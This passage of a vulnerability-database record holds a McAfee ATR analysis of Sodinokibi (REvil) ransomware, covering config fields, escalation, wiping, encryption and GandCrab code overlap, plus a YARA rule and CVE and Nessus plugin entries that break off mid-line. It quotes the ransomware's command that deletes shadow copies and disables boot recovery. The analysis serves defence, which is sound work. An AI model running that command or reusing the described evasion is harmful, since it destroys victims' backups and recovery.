analysis.\n\n FIGURE 2. THE MALWARE GETS ALL FUNCTIONS NEEDED IN RUNTIME \n\n\nThe next action of the malware is trying to create a mutex with a hardcoded name. It is important to know that the malware has 95% of the strings encrypted inside. Consider that each sample of the malware has different strings in a lot of places; values as keys or seeds change all the time to avoid what we, as an industry do, namely making vaccines or creating one decryptor without taking the values from the specific malware sample to decrypt the strings.\n\n FIGURE 3. CREATION OF A MUTEX AND CHECK TO SEE IF IT ALREADY EXISTS \n\n\nIf the mutex exists, the malware finishes with a call to \u201cExitProcess.\u201d This is done to avoid re-launching of the ransomware.\n\nAfter this mutex operation the malware calculates a CRC32 hash of a part of its data using a special seed that changes per sample too. This CRC32 operation is based on a CRC32 polynomial operation instead of tables to make it faster and the code-size smaller.\n\nThe next step is decrypting this block of data if the CRC32 check passes with success. If the check is a failure, the malware will ignore this flow of code and try to use an exploit as will be explained later in the report.\n\n FIGURE 4. CALCULATION OF THE CRC32 HASH OF THE CRYPTED CONFIG AND DECRYPTION IF IT PASSES THE CHECK \n\n\nIn the case that the malware passes the CRC32 check and decrypts correctly with a key that changes per sample, the block of data will get a JSON file in memory that will be parsed. This config file has fields to prepare the keys later to encrypt the victim key and more information that will alter the behavior of the malware.\n\nThe CRC32 check avoids the possibility that somebody can change the crypted data with another config and does not update the CRC32 value in the malware.\n\nAfter decryption of the JSON file, the malware will parse it with a code of a full JSON parser and extract all fields and save the values of these fields in the memory.\n\n FIGURE 5. PARTIAL EXAMPLE OF THE CONFIG DECRYPTED AND CLEANED \n\n\nLet us explain all the fields in the config and their meanings:\n\n * pk -&gt; This value encoded in base64 is important later for the crypto process; it is the public key of the attacker.\n * pid -&gt; The affiliate number that belongs to the sample.\n * sub -&gt; The subaccount or campaign id for this sample that the affiliate uses to keep track of its payments.\n * dbg -&gt; Debug option. In the final version this is used to check if some things have been done or not; it is a development option that can be true or false. In the samples in the wild it is in the false state. If it is set, the keyboard check later will not happen. It is useful for the malware developers to prove the malware works correctly in the critical part without detecting his/her own machines based on the language.\n * fast -&gt; If this option is enabled, and by default a lot of samples have it enabled, the malware will crypt the first 1 megabyte of each target file, or all files if it is smaller than this size. In the case that this field is false, it will crypt all files.\n * wipe -&gt; If this option is \u2018true\u2019, the malware will destroy the target files in the folders that are described in the json field \u201cwfld\u201d. This destruction happens in all folders that have the name or names that appear in this field of the config in logic units and network shares. The overwriting of the files can be with trash data or null data, depending of the sample.\n * wht -&gt; This field has some subfields: fld -&gt; Folders that should not be crypted; they are whitelisted to avoid destroying critical files in the system and programs. fls -&gt; List of whitelists of files per name; these files will never be crypted and this is useful to avoid destroying critical files in the system. ext -&gt; List of the target extensions to avoid encrypting based on extension.\n * wfld -&gt; A list of folders where the files will be destroyed if the wipe option is enabled.\n * prc -&gt; List of processes to kill for unlocking files that are locked by this/these program/s, for example, \u201cmysql.exe\u201d.\n * dmn -&gt; List of domains that will be used for the malware if the net option is enabled; this list can change per sample, to send information of the victim.\n * net -&gt; This value can be false or true. By default, it is usually true, meaning that the malware will send information about the victim if they have Internet access to the domain list in the field \u201cdmn\u201d in the config.\n * nbody -&gt; A big string encoded in base64 that is the template for the ransom note that will appear in each folder where the malware can create it.\n * nname -&gt; The string of the name of the malware for the ransom note file. It is a template that will have a part that will be random in the execution.\n * exp -&gt; This field is very important in the config. By default it will usually be \u2018false\u2019, but if it is \u2018true\u2019, or if the check of the hash of the config fails, it will use the exploit CVE-2018-8453. The malware has this value as false by default because this exploit does not always work and can cause a Blue Screen of Death that avoids the malware\u2019s goal to encrypt the files and request the ransom. If the exploit works, it will elevate the process to SYSTEM user.\n * img -&gt; A string encoded in base64. It is the template for the image that the malware will create in runtime to change the wallpaper of the desktop with this text.\n\nAfter decrypting the malware config, it parses it and the malware will check the \u201cexp\u201d field and if the value is \u2018true\u2019, it will detect the type of the operative system using the PEB fields that reports the major and minor version of the OS.\n\n FIGURE 6. CHECK OF THE VERSION OF THE OPERATIVE SYSTEM \n\n\nUsually only one OS can be found but that is enough for the malware. The malware will check the file-time to verify if the date was before or after a patch was installed to fix the exploit. If the file time is before the file time of the patch, it will check if the OS is 64-bit or 32-bit using the function \u201cGetSystemNativeInfoW\u201d. When the OS system is 32-bit, it will use a shellcode embedded in the malware that is the exploit and, in the case of a 64-bit OS, it will use another shellcode that can use a \u201cHeaven\u00b4s Gate\u201d to execute code of 64 bits in a process of 32 bits.\n\n FIGURE 7. CHECK IF OS IS 32- OR 64-BIT \n\n\nIn the case that the field was false, or the exploit is patched, the malware will check the OS version again using the PEB. If the OS is Windows Vista, at least it will get from the own process token the level of execution privilege. When the discovered privilege level is less than 0x3000 (that means that the process is running as a real administrator in the system or SYSTEM), it will relaunch the process using the \u2018runas\u2019 command to elevate to 0x3000 process from 0x2000 or 0x1000 level of execution. After relaunching itself with the \u2018runas\u2019 command the malware instance will finish.\n\n FIGURE 8. CHECK IF OS IS WINDOWS VISTA MINIMAL AND CHECK OF EXECUTION LEVEL \n\n\nThe malware\u2019s next action is to check if the execute privilege is SYSTEM. When the execute privilege is SYSTEM, the malware will get the process \u201cExplorer.exe\u201d, get the token of the user that launched the process and impersonate it. It is a downgrade from SYSTEM to another user with less privileges to avoid affecting the desktop of the SYSTEM user later.\n\nAfter this it will parse again the config and get information of the victim\u2019s machine This information is the user of the machine, the name of the machine, etc. The malware prepares a victim id to know who is affected based in two 32-bit values concat in one string in hexadecimal.\n\nThe first part of these two values is the serial number of the hard disk of the Windows main logic unit, and the second one is the CRC32 hash value that comes from the CRC32 hash of the serial number of the Windows logic main unit with a seed hardcoded that change per sample.\n\n FIGURE 9. GET DISK SERIAL NUMBER TO MAKE CRC32 HASH \n\n\nAfter this, the result is used as a seed to make the CRC32 hash of the name of the processor of the machine. But this name of the processor is not extracted using the Windows API as GandCrab does; in this case the malware authors use the opcode CPUID to try to make it more obfuscated.\n\n FIGURE 10. GET THE PROCESSOR NAME USING CPUID OPCODE \n\n\nFinally, it converts these values in a string in a hexadecimal representation and saves it.\n\nLater, during the execution, the malware will write in the Windows registry the next entries in the subkey \u201cSOFTWARE\\recfg\u201d (this subkey can change in some samples but usually does not).\n\nThe key entries are:\n\n * 0_key -&gt; Type binary; this is the master key (includes the victim\u2019s generated random key to crypt later together with the key of the malware authors).\n * sk_key -&gt; As 0_key entry, it is the victim\u2019s private key crypted but with the affiliate public key hardcoded in the sample. It is the key used in the decryptor by the affiliate, but it means that the malware authors can always decrypt any file crypted with any sample as a secondary resource to decrypt the files.\n * pk_key -&gt; Victim public key derivate from the private key.\n * subkey -&gt; Affiliate public key to use.\n * stat -&gt; The information gathered from the victim machine and used to put in the ransom note crypted and in the POST send to domains.\n * rnd_ext -&gt; The random extension for the encrypted files (can be from 5 to 10 alphanumeric characters).\n\nThe malware tries to write the subkey and the entries in the HKEY_LOCAL_MACHINE hive at first glance and, if it fails, it will write them in the HKEY_CURRENT_USER hive.\n\n FIGURE 11. EXAMPLE OF REGISTRY ENTRIES AND SUBKEY IN THE HKLM HIVE \n\n\nThe information that the malware gets from the victim machine can be the user name, the machine name, the domain where the machine belongs or, if not, the workgroup, the product name (operating system name), etc.\n\nAfter this step is completed, the malware will check the \u201cdbg\u201d option gathered from the config and, if that value is \u2018true\u2019, it will avoid checking the language of the machine but if the value is \u2018false\u2019 ( by default), it will check the machine language and compare it with a list of hardcoded values.\n\n FIGURE 12. GET THE KEYBOARD LANGUAGE OF THE SYSTEM \n\n\nThe malware checks against the next list of blacklisted languages (they can change per sample in some cases):\n\n * **0x818 \u2013 **Romanian (Moldova)\n * **0x419 \u2013 **Russian\n * **0x819 \u2013 **Russian (Moldova)\n * **0x422 \u2013 **Ukrainian\n * **0x423 \u2013 **Belarusian\n * **0x425 \u2013 **Estonian\n * **0x426 \u2013 **Latvian\n * **0x427 \u2013 **Lithuanian\n * **0x428 \u2013 **Tajik\n * **0x429 \u2013 **Persian\n * **0x42B \u2013 **Armenian\n * **0x42C \u2013 **Azeri\n * **0x437 \u2013 **Georgian\n * **0x43F \u2013 **Kazakh\n * **0x440 \u2013 **Kyrgyz\n * **0x442 \u2013**Turkmen\n * **0x443 \u2013 **Uzbek\n * **0x444 \u2013 **Tatar\n * **0x45A \u2013 **Syrian\n * **0x2801 \u2013 **Arabic (Syria)\n\nWe observed that Sodinokibi, like GandCrab and Anatova, are blacklisting the regular Syrian language and the Syrian language in Arabic too. If the system contains one of these languages, it will exit without performing any action. If a different language is detected, it will continue in the normal flow.\n\nThis is interesting and may hint to an affiliate being involved who has mastery of either one of the languages. This insight became especially interesting later in our investigation.\n\nIf the malware continues, it will search all processes in the list in the field \u201cprc\u201d in the config and terminate them in a loop to unlock the files locked for this/these process/es.\n\n FIGURE 13. SEARCH FOR TARGET PROCESSES AND TERMINATE THEM \n\n\nAfter this it will destroy all shadow volumes of the victim machine and disable the protection of the recovery boot with this command:\n\n * exe /c vssadmin.exe Delete Shadows /All /Quiet &amp; bcdedit /set {default} recoveryenabled No &amp; bcdedit /set {default} bootstatuspolicy ignoreallfailures\n\nIt is executed with the Windows function \u201cShellExecuteW\u201d.\n\n FIGURE 14. LAUNCH COMMAND TO DESTROY SHADOW VOLUMES AND DESTROY SECURITY IN THE BOOT \n\n\nNext it will check the field of the config \u201cwipe\u201d and if it is true will destroy and delete all files with random trash or with NULL values. If the malware destroys the files , it will start enumerating all logic units and finally the network shares in the folders with the name that appear in the config field \u201cwfld\u201d.\n\n FIGURE 15. WIPE FILES IN THE TARGET FOLDERS \n\n\nIn the case where an affiliate creates a sample that has defined a lot of folders in this field, the ransomware can be a solid wiper of the full machine.\n\nThe next action of the malware is its main function, encrypting the files in all logic units and network shares, avoiding the white listed folders and names of files and extensions, and dropping the ransom note prepared from the template in each folder.\n\n FIGURE 16. CRYPT FILES IN THE LOGIC UNITS AND NETWORK SHARES \n\nAfter finishing this step, it will create the image of the desktop in runtime with the text that comes in the config file prepared with the random extension that affect the machine.\n\nThe next step is checking the field \u201cnet\u201d from the config, and, if true, will start sending a POST message to the list of domains in the config file in the field \u201cdmn\u201d.\n\n FIGURE 17. PREPARE THE FINAL URL RANDOMLY PER DOMAIN TO MAKE THE POST COMMAND \n\nThis part of the code has similarities to the code of GandCrab, which we will highlight later in this article.\n\nAfter this step the malware cleans its own memory in vars and strings but does not remove the malware code, but it does remove the critical contents to avoid dumps or forensics tools that can gather some information from the RAM.\n\n FIGURE 18. CLEAN MEMORY OF VARS \n\n\nIf the malware was running as SYSTEM after the exploit, it will revert its rights and finally finish its execution.\n\n FIGURE 19. REVERT THE SYSTEM PRIVILEGE EXECUTION LEVEL \n\n\n## Code Comparison with GandCrab\n\nUsing the unpacked Sodinokibi sample and a v5.03 version of GandCrab, we started to use IDA and BinDiff to observe any similarities. Based on the Call-Graph it seems that there is an overall 40 percent code overlap between the two:\n\n FIGURE 20. CALL-GRAPH COMPARISON \n\n\nThe most overlap seems to be in the functions of both families. Although values change, going through the code reveals similar patterns and flows:\n\n\n\nAlthough here and there are some differences, the structure is similar:\n\n\n\nWe already mentioned that the code part responsible for the random URL generation has similarities with regards to how it is generated in the GandCrab malware. Sodinokibi is using one function to execute this part where GandCrab is using three functions to generate the random URL. Where we do see some similar structure is in the parts for the to-be-generated URL in both malware codes. We created a visual to explain the comparison better:\n\n FIGURE 21. URL GENERATION COMPARISON \n\n\nWe observe how even though the way both ransomware families generate the URL might differ, the URL directories and file extensions used have a similarity that seems to be more than coincidence. This observation was also discovered by Tesorion in one of its [blogs](<https://www.tesorion.nl/aconnection-between-the-sodinokibi-and-gandcrab-ransomware-families/>).\n\nOverall, looking at the structure and coincidences, either the developers of the GandCrab code used it as a base for creating a new family or, another hypothesis, is that people got hold of the leaked GandCrab source code and started the new RaaS Sodinokibi.\n\n## Conclusion\n\nSodinokibi is a serious new ransomware threat that is hitting many victims all over the world.\n\nWe executed an in-depth analysis comparing GandCrab and Sodinokibi and discovered a lot of similarities, indicating the developer of Sodinokibi had access to GandCrab source-code and improvements. The Sodinokibi campaigns are ongoing and differ in skills and tools due to the different affiliates operating these campaigns, which begs more questions to be answered. How do they operate? And is the affiliate model working? McAfee ATR has the answers in episode 2, \u201c[The All Stars](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-the-all-stars/>).\u201d\n\n## Coverage\n\nMcAfee is detecting this family by the following signatures:\n\n * \u201cRansom-Sodinokibi\u201d\n * \u201cRansom-REvil!\u201d.\n\n## MITRE ATT&amp;CK Techniques\n\nThe malware sample uses the following MITRE ATT&amp;CK\u2122 techniques:\n\n * File and Directory Discovery\n * File Deletion\n * Modify Registry\n * Query Registry\n * Registry modification\n * Query information of the user\n * Crypt Files\n * Destroy Files\n * Make C2 connections to send information of the victim\n * Modify system configuration\n * Elevate privileges\n\n### YARA Rule\n\nrule Sodinokobi\n\n{\n\n/*\n\nThis rule detects Sodinokobi Ransomware in memory in old samples and perhaps future.\n\n*/\n\nmeta:\n\nauthor = \u201cMcAfee ATR team\u201d\n\nversion = \u201c1.0\u201d\n\ndescription = \u201cThis rule detect Sodinokobi Ransomware in memory in old samples and perhaps future.\u201d\n\nstrings:\n\n$a = { 40 0F B6 C8 89 4D FC 8A 94 0D FC FE FF FF 0F B6 C2 03 C6 0F B6 F0 8A 84 35 FC FE FF FF 88 84 0D FC FE FF FF 88 94 35 FC FE FF FF 0F B6 8C 0D FC FE FF FF }\n\n$b = { 0F B6 C2 03 C8 8B 45 14 0F B6 C9 8A 8C 0D FC FE FF FF 32 0C 07 88 08 40 89 45 14 8B 45 FC 83 EB 01 75 AA }\n\ncondition:\n\nall of them\n\n} \n \n---\n", "cvss3": {}, "published": "2019-10-02T00:00:00", "type": "trellix", "title": "McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service - What The Code Tells Us", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-8453"], "modified": "2019-10-02T00:00:00", "id": "TRELLIX:293F3289BEEBB7BF373F9B864BE24DC4", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "prion": [{"lastseen": "2023-08-16T01:19:33", "description": "On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2, the iControl REST interface has an unauthenticated remote command execution vulnerability. Note: Software versions which have reached End of Software Development (EoSD) are not evaluated.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-31T15:15:00", "type": "prion", "title": "CVE-2021-22986", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2022-07-12T17:42:00", "id": "PRION:CVE-2021-22986", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-22986", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T05:58:39", "description": "Windows Print Spooler Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-02T22:15:00", "type": "prion", "title": "CVE-2021-34527", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-07-02T21:08:00", "id": "PRION:CVE-2021-34527", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-34527", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "F5 BIG-IP and BIG-IQ Centralized Management contain a remote code execution vulnerability in the iControl REST interface that allows unauthenticated attackers with network access to execute system commands, create or delete files, and disable services.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "F5 BIG-IP and BIG-IQ Centralized Management iControl REST Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-22986", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Windows Win32k contains a vulnerability which allows an attacker to escalate privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-21T00:00:00", "type": "cisa_kev", "title": "Microsoft Win32k Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8453"], "modified": "2022-01-21T00:00:00", "id": "CISA-KEV-CVE-2018-8453", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Windows Print Spooler contains an unspecified vulnerability due to the Windows Print Spooler service improperly performing privileged file operations. Successful exploitation allows an attacker to perform remote code execution with SYSTEM privileges. The vulnerability is also known under the moniker of PrintNightmare.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Print Spooler Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-34527", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-09-26T15:36:12", "description": "A remote code execution vulnerability exists in the iControl REST API feature of F5's BIG-IP product. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands with root privileges.", "cvss3": {}, "published": "2021-03-24T00:00:00", "type": "nessus", "title": "F5 BIG-IP RCE (CVE-2021-22986)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22986"], "modified": "2023-09-25T00:00:00", "cpe": ["cpe:/h:f5:big-ip"], "id": "F5_CVE-2021-22986.NBIN", "href": "https://www.tenable.com/plugins/nessus/148022", "sourceData": "Binary data f5_cve-2021-22986.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-10T15:05:05", "description": "The version of F5 Networks BIG-IP installed on the remote host is prior to 12.1.5.3 / 13.1.3.6 / 14.1.4 / 15.1.2.1 / 16.0.1.1 / 16.1.0. It is, therefore, affected by a vulnerability as referenced in the K03009991 advisory.\n\n - On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2, the iControl REST interface has an unauthenticated remote command execution vulnerability. Note: Software versions which have reached End of Software Development (EoSD) are not evaluated. (CVE-2021-22986)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-03-10T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : iControl REST unauthenticated remote command execution vulnerability (K03009991)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22986"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL03009991.NASL", "href": "https://www.tenable.com/plugins/nessus/147626", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K03009991.\n#\n# @NOAGENT@\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147626);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\"CVE-2021-22986\");\n script_xref(name:\"IAVA\", value:\"2021-A-0127\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0017\");\n\n script_name(english:\"F5 Networks BIG-IP : iControl REST unauthenticated remote command execution vulnerability (K03009991)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of F5 Networks BIG-IP installed on the remote host is prior to 12.1.5.3 / 13.1.3.6 / 14.1.4 / 15.1.2.1 /\n16.0.1.1 / 16.1.0. It is, therefore, affected by a vulnerability as referenced in the K03009991 advisory.\n\n - On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before\n 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2, the\n iControl REST interface has an unauthenticated remote command execution vulnerability. Note: Software\n versions which have reached End of Software Development (EoSD) are not evaluated. (CVE-2021-22986)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K03009991\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5 Solution K03009991.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22986\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'F5 iControl REST Unauthenticated SSRF Token Generation RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude('f5_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar version = get_kb_item('Host/BIG-IP/version');\nif ( ! version ) audit(AUDIT_OS_NOT, 'F5 Networks BIG-IP');\nif ( isnull(get_kb_item('Host/BIG-IP/hotfix')) ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/hotfix');\nif ( 